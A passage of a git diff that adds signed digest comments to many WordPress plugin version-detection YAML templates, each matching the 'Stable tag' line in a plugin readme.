b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..79d3d9f007 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220713beae31bf8e44d3700d0151f03c96f3f1d73e741c2fe4d4bccaf3733f3902d02210088eb6c90cec2ab8bd3a9e8811202fd1b597b1e268b6ddc02fe1cafbcc192a5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..c8d685654c 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008d602567e517fae231869913b325551872d37178ef95b6cb9c78672482a4f09e0221008878b4c1253c38ba8dcbe8d24ec968bf8a3545b359803996f20f28b22df368ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..f2d7f111b7 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d7069c6468f6f811bca4d8c21575b02c3bc6418c2eaa49d79c0cff7cb882897d02206b101f1f897acef7ec40a3b85e97213e1979adb1a11ac8424338c152c0329487:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..882fec1018 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009f3154062fb529de2fb5ac5a0540c36ad4705b1fff9e9ffe0d0973cdc2c171930220385f26e1af8c5ae5d5324c429587845ef9d69f7bb180f0eb459c5ed0a9a9f39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..e95e9906c9 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008477c377d8b886fa5fe1396cdd511ca8152de100a176af23629b145fbe7b8d1f022100cff8be5bb1f25301c62b2437f1f0ea628b064be3e9740afa1d7918720df8349a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..2e2b65f979 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b16122fd32693803e056d0ca41f2cb87ffe7645a8ab711bbba9f5d5dbfdf6e3402203b868f928156cd6667a8fc966526cbb70116917ee39064cd36c1ad3be5a4b6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index b6f392efba..d8b8221216 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204b9da61bff95911bad7732bd117b28d47ec40b913276e0f9717e3146bdd5238a02203bf84c90b56fb7968cca8df0734e1041f62cac19aa5a843ed388e736e5c4e841:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..5d94deea0c 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022075936708ce214635fce5787252f2f6945b4101071705e57cb2a8182bd16bb2f1022100872047dd782b13eafee9166ec32bdc5848d497e6d4058953dc53744334c72986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..e994cc0f3e 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201053423bbcb4ed890db451d668691eecd2e34d0e93935ea41e83902d9f5bcd29022100d6445329e026ddd26b69f2a11e380b8dfac46a3d7bf2e94fc3a8e3d3d59ad15f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..da4ec0b77a 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206645534cea1ca9b7748c1917f5e74672eefc54f4057ef883a003c1d66707c5490221008c7dbe464266b1cadf3438fd4f4b2c3fda5c473d8a18178cf6b231f398436c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..db103a8899 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204e34ca501a39b56e1557fdd2505fe226e5d62ae607c6da3822cbc6219946d9fa022100dfe8d4a67dcecf595cb1c2eb2deecef21beed70fb54f056b073bfe9a305513a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..9dbb529529 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e713c4e50c16700644d950820561521f096cd472c373605b94c6513f0fe6ff580220486cf792eeaafc81884b44411d47709feb56103c146c481ac9152f53f59bb510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..c368e1eef7 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220275482125dec4dad3ab8fde5155d31ec7a83b40acdf436ff8b23dfe9b7b1acb40220353fb9a77db54d0df73dee1ddd290645e77b599dd4e5bec2dedc132f476f44b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..b5d1d2630c 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008680fd4a72d9df0edf57061f87033b28bfd77d83d385e9584016ea947126a8d302206a7993b0974bb766b2230cec528170b487a00058dfc7df38395a2970bbbebdd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..1559438d68 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022008f0526345dbdd0da57de04fcb607112efd66e418c5e5dc53ed79d2997a91c44022100d6d497aec3cdb879952b78a573f548bbb2fea14cf82eaf71c10d6de62b2b2170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..7ae55020cf 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100825a495c9936e4dc792365c1e5063fd021014214830db2fa8930cd3b1e4ab63b02200149fdeafbfbeeaebc9245b59650a19b1078a188d4f008804ed6566a2b804d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..5821caecb2 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201cc4f86a33e0474c2dc9ae3960ad1ad2e31a362194b9e77094e7453a1aa4f7f1022100acf180ffc5b41b014313de0f75fa54a480e7382871250474718ed11a8c6a91bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..22ac3b5d49 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a3f76ac8e9361685601c693a9e4eef07f3cb32aefa87a3a1d4f46262514f595b022028beb040a698c382bbe5df25eaef2fabd001f1d910167a012a1468b5a156e2dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..b878f06c15 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100980a38f0b64ba9386218a21ca834407dae5c46560a29eb67d95427e389b901bf022100c8cf3080ebb42a4d0dce4dcc69a68f5da11d4f0bed02c7ffb02582d8fa9a04bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..f382178b6f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502205cf88bab5fa85a4ac47d1b1c2edf8e8301fe78548d6da8e2d7f7c0ee9f0b8f0e022100a62e1461aaef40007fb4a77c3ac99dea11b57e0b6f98b54120c575acbcafc03f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..7774091e5b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022014eb17fc306927a61ef0231ab84614450e2646562a31c834998f756c100526f1022100ad8929f17ac02a611e5d79da5e15ac0c155deea6950ed6e7f7a4079762bd8d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..0900d3af95 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b0e4131ad02772c3a18557a378f6bcca537954f126cf31a10c26683252c94ca6022100af3708e6f5fdd868cc1da307791bf1aabe119448961b32a6a60f6b9b60f2eedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..8c425088d2 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022015bbc14d6e08426bbf37e6196790ba59a3cc917e21cdd6908e26489f22809d01022100889d9c4d94ede9370bfe890d23d99003a1a8db22ace52abaf647d718c3b5a100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..176dabbb20 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203cf90902831ab27f1617c3596d26f190434612b05a82b8be011cb25544de5a90022100f690e64933d8c64610ff0663e4037795a81fd00630acc674452d03e74e28744d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..23deecaa2d 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201d5fd10904a5eb0d851436605e10265e4838dd7c698f7fcf7f487d6fde943b7202204e1e2b5aee3b3c32c3c077abc18539f718dc773cbeaf3db5fa8b743efcb45d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..3b3d93a1bb 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cd22f4ed7c42febfdd02b0d4ac5bd6708408e5b9a82f99d608472a2b1788e35a022100e6fa269d7a46d65a4fed63b8b26d538e1091603896e172359d0c0dd649ca8bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..4d6955c516 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022057c1314e94c324093438bd497b674bf80657b0ed3650928af08a51081879dae20220427c52d205cb413ecab7b4e2468f3009d2978a4d17b1d04a2ff265cb500af144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..8b5bb06f6f 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207adc60c49da00411c2da57ebb61248fb614a37f381fa30af838c52b81d36d42f022100901de1663a2f5030c3a346fa22ef3549a20c4d61a630726a35ca3e699ec9c8fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..1af4f7f0d8 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a7333bbb3ca2d56ed9cd28ada7a937e1f47763d551b453df21fb96b35adc04660220217c59fbf857bf5d48dd4745e3fad673d1fb69c02180a5732d3670dcc8e0116b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..4d98b7dcd2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e0c5ddc200988922cacb0a1068f666fe58ec5956515c9ad1255e4f296a03cc6f02201d0fffc5722febc2b6fdec74adc24fa6f59bd2e38088402842afc68a28f3d483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..da83918577 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200d99ebb76b6d4d3acdf8705491d8aae656eaf7fcd36735c7f05e8ddfcd0287f6022053c5f1419b87229b9728721b038634c2d633a23b5ef009d2d88583ca4deb73e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..922955890d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b9a8f803c24c6aff055f47be602deab2ffcd415aefda515bd4026bfcb381b9c102200da0fc8c18c69e6e88735241ba18e51b649e643cee660fbdf619f92b4962ade8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..8f398ec1c0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fd2828ffbf5bb73425274803a2c5a39bced9930db9bdccbba0a344348f2ad91c022032d107ca514b52fd92a507aa50a0a21b4b12089bafd6c72a041a80f5161e1c38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..8a521cb683 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100be1213813634dfc056cb834fbcaa4baa9d29a3734391a331f8111917d8b13aa10220735ae76e2561d250038b20ad46dec72cbd3b432ed67b995d74dbe9c5a036b1c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..684cdf1dcc 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220587c6475b9f4b2d7e1542ba4184288769e1855b9de375316e0b23ba42ce432b3022003e4953ad84ae38ec90b5dcd702d978899eef26e13d848688ef6d5210ecf900d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..ebf2336c6a 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100db2a13bf8e14f7a19c516260e11bf23062223e36a0b23b7eb04b8581872ddd940220541bb9a9443610c161a1862b6a1f73fba7ce28077cdf358d928b296956a5272b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..9dbbe05bbc 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210088ec2dd45c60ce953b6757e0e42ca2dc5c7f8160a34920cac8a47013a588584902203f8a51efbcc73721230f2cd56473c1562bfc05c5347f011619d2fabbdcb85f3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..f680a30c93 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022070f571dab5b67de791ef4d7953767d4fce07187140da9094ebb459013b4bf284022100c1b70b6b486944116dad5d5b91eab481ddf90d45e6f15944942f7fca1d56b350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..30c4c87016 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022036dbdad43ccfed93897ff783ad82e142e10b2571433be1c45c0b46c255e778440221009a044ad841b31066742ebe90403a9e6c0e6df95c3164028eeb4943fe049be851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..9d62d58510 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206accbf78c87548e9dbadb79a55d46c494536ae37d0c10ce3d1729daad1eb2316022100ce4f8929efcbf475d87414800d0ed060b552eabd74d59ccb431f8cfa2565e05c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..7d48935b0e 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100da33cedb9c6d9e406f76eba676e25a32f2642668899447c2480489e320b3d54002206265d681daa7bd73968ab6da87e38267eb77e17fe4ed5ffe57c5c3f792abf001:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..a020f1e78b 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f0e7de8a089633d320581b6b410fe70db1b08d72a409f2dacf486fb27b4ab27c0220703c71ed28cfea3eadddab023cd6810edd6863a8729712fdd5903e085f67f767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..bd60bbc937 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ec80b42d17f40983f70eb365a031eed09c3d54e0f469e820ced57feb9992f56a022064b8b076b329ed61f86b07ac8234aa63ab4baf875c74eecfbd9aa5fe3112eefa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..5db71abfcf 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206ffed1308dc3ab653895e948ef0bd1435421aedd6117e17fc41678ff3ed49af3022100d2d8be53fa42ea29823a06ac745a3e5ff25486ccfca39f0ecd7d25c7262790b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 01a3669132..baad513d3d 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210096276020eeffb95a516f72034adb524eb4f2aac8f33089aff82ec4c33974c4c2022100e75cd6e737188f7e66723675997e40669860a48356fd515495903e02fd75d4ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..81c605533b 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220123cd1b1cbed1050db6af1c3fb44ab9e16df36f0339e2dca8ccbc58a6c7c6214022100abfc2652d3623bdd8f3042c25b3d7e4d34ca0033081ded467ef6a41bb620b918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index dc18db23b1..13d13e6b29 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ 